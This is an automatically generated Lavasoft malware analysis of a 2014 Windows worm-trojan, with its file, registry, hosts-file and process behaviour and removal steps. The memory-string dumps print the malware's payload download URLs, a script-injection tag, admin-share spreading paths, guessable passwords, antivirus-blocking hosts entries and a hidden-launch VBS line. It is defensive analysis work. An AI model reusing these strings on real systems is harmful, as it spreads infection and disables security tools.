Trojan.Crypt.EL_0ed04d3bf5

by malwarelabrobot on October 18th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Crypt.EL (B) (Emsisoft), Trojan.Crypt.EL (AdAware), GenericAutorunWorm.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0ed04d3bf545d16e27373f1dc8e25b96
SHA1: 002650d60953f287722421d7c88515f9b1e5b73e
SHA256: 77f47f9710895724ce6dfb153722efdb07c19c704e5754137271760b3afd1dc8
SSDeep: 384:IqTfFGmEb6ec9Jqm b42wCKt2Xe6w3z8XBcWaFzra8ypNWodXU:TUj8JNndAXGWa28ypN5l
Size: 17412 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2008-06-10 11:48:24
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Trojan creates the following process(es):

ipconfig.exe:1768
%original file name%.exe:580

The Trojan injects its code into the following process(es):

csrss.exe:352

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\mfxixue.bat (100 bytes)
%WinDir%\Tasks\csrss.exe (1444 bytes)

Registry activity

The process ipconfig.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 5D 0B E6 57 05 7B 66 E9 E9 D1 1B EF 4A 01 82"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 92 E9 9F 25 8F C8 B2 09 A0 FD 3C C3 5B 53 DE"

Dropped PE files

MD5 File path
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\bin\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\eg\IEExamples\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\eg\PerlEx\benchmarks\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\eg\PerlEx\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\eg\Windows Script Components\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\eg\Windows Script Host\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\eg\aspSamples\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\eg\cgi\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\eg\fork\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\eg\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\etc\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\Components\Windows\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\Components\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\bin\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\faq\Windows\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\faq\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\images\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\ActivePerl\DocTools\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\ActivePerl\PPM\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\ActivePerl\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\ActiveState\Config\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\ActiveState\PerlCritic\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\ActiveState\Tkx\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\ActiveState\Win32\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\ActiveState\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Algorithm\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\App\Prove\State\Result\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\App\Prove\State\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\App\Prove\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\App\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Archive\Tar\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Archive\Zip\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Archive\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Attribute\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\B\Lint\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\B\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Bit\Vector\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Bit\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Bundle\DBD\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Bundle\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CGI\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Backend\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Config\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Dist\Build\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Dist\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Internals\Source\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Internals\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Module\Author\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Module\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Shell\Default\Plugins\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Shell\Default\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\Shell\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPANPLUS\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPAN\API\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPAN\Meta\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\CPAN\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Carp\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\Accessor\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\C3\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\Data\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\Load\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\MOP\Class\Immutable\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\MOP\Class\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\MOP\Method\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\MOP\Mixin\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\MOP\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Class\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Compress\Raw\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Compress\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Config\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBD\File\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBD\Gofer\Policy\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBD\Gofer\Transport\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBD\Gofer\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBD\ODBC\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBD\Oracle\Troubleshooting\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBD\Oracle\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBD\SQLite\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBD\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\Const\GetInfo\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\Const\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\DBD\SqlEngine\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\DBD\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\Gofer\Serializer\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\Gofer\Transport\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\Gofer\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\ProfileDumper\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\SQL\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\Util\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBI\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\DBM_Filter\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Data\Dump\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Data\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Date\Calc\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Date\Calendar\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Date\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Devel\NYTProf\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Devel\StackTrace\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\Devel\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\autodie\exception\wsock32.dll
d50cc09e37307d26ad4c2fce8957d0ed c:\Perl\html\lib\autodie\wsock32.dll
74d1714198df65437f50e3bedbe569e8 c:\WINDOWS\Tasks\csrss.exe
d50cc09e37307d26ad4c2fce8957d0ed c:\WINDOWS\Tasks\wsock32.dll
74d1714198df65437f50e3bedbe569e8 c:\WINDOWS\Tasks\ÂÌ»¯.bat

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 884 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 home.ahnlab.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 www.kaspersky.co.kr
127.0.0.1 www.viruschaser.com
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.kaspersky.com
127.0.0.1 60.210.176.251
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.0 360.qihoo.com
127.0.0.1 qihoo.com
127.0.0.1 www.qihoo.com
127.0.0.1 www.qihoo.cn


Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.data 4096 30860 1536 5.25168 31392cffd7cb634aa8c140cd4335067a
.rsrc 36864 8192 0 0 d41d8cd98f00b204e9800998ecf8427e
.shoooo 45056 16384 14848 5.51577 105e1ee7b1c910e9f70c16f4b088ca41

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://192.168.1.1/


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

OPTIONS / HTTP/1.1..translate: f..User-Agent: Microsoft-WebDAV-MiniRed
ir/5.1.2600..Host: 192.168.1.1..Content-Length: 0..Connection: Keep-Al
ive....


HTTP/1.1 200 OK

Expires: Sun, 19 Oct 2014 23:16:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=180000
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 17 Oct 2014 21:16:21 GMT
X-Frame-Options: SAMEORIGIN
Set-Cookie: PHPSESSID=7783c394f6868356bc89ed344377fd1d; path=/
Set-Cookie: cookie_test=1413584181
Pragma: no-cache
Content-type: text/html
Transfer-Encoding: chunked
Date: Fri, 17 Oct 2014 21:16:21 GMT
Server: lighttpd/1.4.35
1a22...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//E
N". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.&l
t;html xmlns="hXXp://VVV.w3.org/1999/xhtml" lang="en" xml:lang="en">
;..<head>...<script type="text/javascript" src="/javascript/j
query.js"></script>...<script type="text/javascript">..
.//<![CDATA[...$(document).ready(function() { jQuery('#usernamefld'
).focus(); });...//]]>...</script>....<title>Login</
title>...<meta http-equiv="Content-Type" content="text/html; cha
rset=iso-8859-1" />...<link rel="shortcut icon" href="/themes/pf
sense_ng/images/icons/favicon.ico" />.....<link rel="stylesheet"
type="text/css" href="/themes/pfsense_ng/login.css" media="all" />
.....<script type="text/javascript">...//<![CDATA[....functio
n page_load() {}....function clearError() {.....if($('#inputerrors')).
....$('#inputerrors').html('');....}..... var input_errors = '';.
jQuery(document).ready(init);. . var noAjaxOnSubmit = false;..
function init() {. if(jQuery('#submit') && ! noAjaxOnSubmit) {.
// debugging helper. //alert('adding observe event for
submit button');. . jQuery("#submit").click(submit_form)
;. jQuery('#submit').click(function() {return false;});.
var to_insert = "<div style='visibility:hidden' id='loading' name=
'loading'><img src='/themes/pfsense_ng/images/misc/loader.gif' a
lt='loader' \/><\/div>";. jQuery('#submit').before

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

csrss.exe_352:

.data
.rsrc
.shoooo
<script src=hXXp://vntkr.com/img/btn/1.js></script>
recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe
hXXp://vntkr.com/img/btn/wm/arp.exe
hXXp://vntkr.com/img/btn/wm/wincap.exe
hXXp://vntkr.com/img/btn/tj/ct.asp
hXXp://vntkr.com/img/btn/wm/updatexixue.txt
hXXp://vntkr.com/img/btn/wm/mm.exe
c:\_default.pif
SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
FWMon.exe
del "%s"
start %s
c:\mfxixue.bat
%WinDir%\Tasks
AST.exe
360tray.exe
ast.exe
windows
hXXp://VVV.microsoft.com
autorun.inf
\GHOSTBAK.exe
recycle.{645FF040-5081-101B-9F08-00AA002F954E}
%s -idx 0 -ip %s -port 80 -insert "%s"
%s\arps.com
%d.%d.%d.2-%d.%d.%d.255
\wincap.exe
\arps.com
%d.%d.%d.%d
1314520
5201314
12345678
password
at \\%s %d:%d %s
F:\hackshen.exe
\\%s\F$\hackshen.exe
E:\hackshen.exe
\\%s\E$\hackshen.exe
D:\hackshen.exe
\\%s\D$\hackshen.exe
C:\hackshen.exe
\\%s\C$\hackshen.exe
\\%s\admin$\hackshen.exe
\\%s\ipc$
mpr.dll
hXXp://vntkr.com/img/btn/10.exe
hXXp://vntkr.com/img/btn/9.exe
hXXp://vntkr.com/img/btn/8.exe
hXXp://vntkr.com/img/btn/7.exe
hXXp://vntkr.com/img/btn/6.exe
hXXp://vntkr.com/img/btn/5.exe
hXXp://vntkr.com/img/btn/4.exe
hXXp://vntkr.com/img/btn/2.exe
hXXp://vntkr.com/img/btn/1.exe
hXXp://vntkr.com/img/btn/3.exe
%s?mac=%s&ver=2.2
windows config
\mfxixue.ini
%s -ep a "%s" %s
\WinRAR\Rar.exe
\meupdate.ini
127.0.0.0 360.qihoo.com
127.0.0.1 qihoo.com
127.0.0.1 VVV.qihoo.com
127.0.0.1 VVV.qihoo.cn
127.0.0.1 9u9u9.cn
127.0.0.1 58.17.236.92
127.0.0.1 VVV.kaspersky.com
127.0.0.1 60.210.176.251
127.0.0.1 VVV.cnnod32.cn
127.0.0.1 VVV.lanniao.org
127.0.0.1 VVV.nod32club.com
127.0.0.1 VVV.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 VVV.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1 VVV.jiangmin.com
127.0.0.1 VVV.duba.net
127.0.0.1 VVV.eset.com.cn
127.0.0.1 VVV.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 VVV.kaspersky.co.kr
127.0.0.1 VVV.viruschaser.com
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.360safe.cn
127.0.0.1 VVV.360safe.com
127.0.0.1 home.ahnlab.com
127.0.0.1 VVV.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
\svchost.exe
ntdll.dll
Set rs=createObject("Wscript.shell")
rs.run "%%windir%%\Tasks\csrss.exe",0
\Tasks\hackshen.vbs
SOFTWARE\Microsoft\Windows Script Host\Settings
%windir%\Tasks\hackshen.vbs
%Documents and Settings%
%WinDir%
%s\%s
%s\*.*
\Tasks\wsock32.dll
\wsock32.dll
%System%\arps.com
%System%\wincap.exe
%System%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\0NrSJbRlzJ.pif
%WinDir%\Tasks\
%WinDir%\Tasks\csrss.exe
.reloc
kernel32.dll
}y%Dw

csrss.exe_352_rwx_00401000_0000B000:

<script src=hXXp://vntkr.com/img/btn/1.js></script>
recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe
hXXp://vntkr.com/img/btn/wm/arp.exe
hXXp://vntkr.com/img/btn/wm/wincap.exe
hXXp://vntkr.com/img/btn/tj/ct.asp
hXXp://vntkr.com/img/btn/wm/updatexixue.txt
hXXp://vntkr.com/img/btn/wm/mm.exe
c:\_default.pif
SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
FWMon.exe
del "%s"
start %s
c:\mfxixue.bat
%WinDir%\Tasks
AST.exe
360tray.exe
ast.exe
windows
hXXp://VVV.microsoft.com
autorun.inf
\GHOSTBAK.exe
recycle.{645FF040-5081-101B-9F08-00AA002F954E}
%s -idx 0 -ip %s -port 80 -insert "%s"
%s\arps.com
%d.%d.%d.2-%d.%d.%d.255
\wincap.exe
\arps.com
%d.%d.%d.%d
1314520
5201314
12345678
password
at \\%s %d:%d %s
F:\hackshen.exe
\\%s\F$\hackshen.exe
E:\hackshen.exe
\\%s\E$\hackshen.exe
D:\hackshen.exe
\\%s\D$\hackshen.exe
C:\hackshen.exe
\\%s\C$\hackshen.exe
\\%s\admin$\hackshen.exe
\\%s\ipc$
mpr.dll
hXXp://vntkr.com/img/btn/10.exe
hXXp://vntkr.com/img/btn/9.exe
hXXp://vntkr.com/img/btn/8.exe
hXXp://vntkr.com/img/btn/7.exe
hXXp://vntkr.com/img/btn/6.exe
hXXp://vntkr.com/img/btn/5.exe
hXXp://vntkr.com/img/btn/4.exe
hXXp://vntkr.com/img/btn/2.exe
hXXp://vntkr.com/img/btn/1.exe
hXXp://vntkr.com/img/btn/3.exe
%s?mac=%s&ver=2.2
windows config
\mfxixue.ini
%s -ep a "%s" %s
\WinRAR\Rar.exe
\meupdate.ini
127.0.0.0 360.qihoo.com
127.0.0.1 qihoo.com
127.0.0.1 VVV.qihoo.com
127.0.0.1 VVV.qihoo.cn
127.0.0.1 9u9u9.cn
127.0.0.1 58.17.236.92
127.0.0.1 VVV.kaspersky.com
127.0.0.1 60.210.176.251
127.0.0.1 VVV.cnnod32.cn
127.0.0.1 VVV.lanniao.org
127.0.0.1 VVV.nod32club.com
127.0.0.1 VVV.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 VVV.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1 VVV.jiangmin.com
127.0.0.1 VVV.duba.net
127.0.0.1 VVV.eset.com.cn
127.0.0.1 VVV.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 VVV.kaspersky.co.kr
127.0.0.1 VVV.viruschaser.com
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.360safe.cn
127.0.0.1 VVV.360safe.com
127.0.0.1 home.ahnlab.com
127.0.0.1 VVV.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
\svchost.exe
ntdll.dll
Set rs=createObject("Wscript.shell")
rs.run "%%windir%%\Tasks\csrss.exe",0
\Tasks\hackshen.vbs
SOFTWARE\Microsoft\Windows Script Host\Settings
%windir%\Tasks\hackshen.vbs
%Documents and Settings%
%WinDir%
%s\%s
%s\*.*
\Tasks\wsock32.dll
\wsock32.dll
%System%\arps.com
%System%\wincap.exe
%System%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\0NrSJbRlzJ.pif
%WinDir%\Tasks\
%WinDir%\Tasks\csrss.exe
.data
.reloc
.shoooo
kernel32.dll
}y%Dw


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ipconfig.exe:1768
    %original file name%.exe:580

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\mfxixue.bat (100 bytes)
    %WinDir%\Tasks\csrss.exe (1444 bytes)

  4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now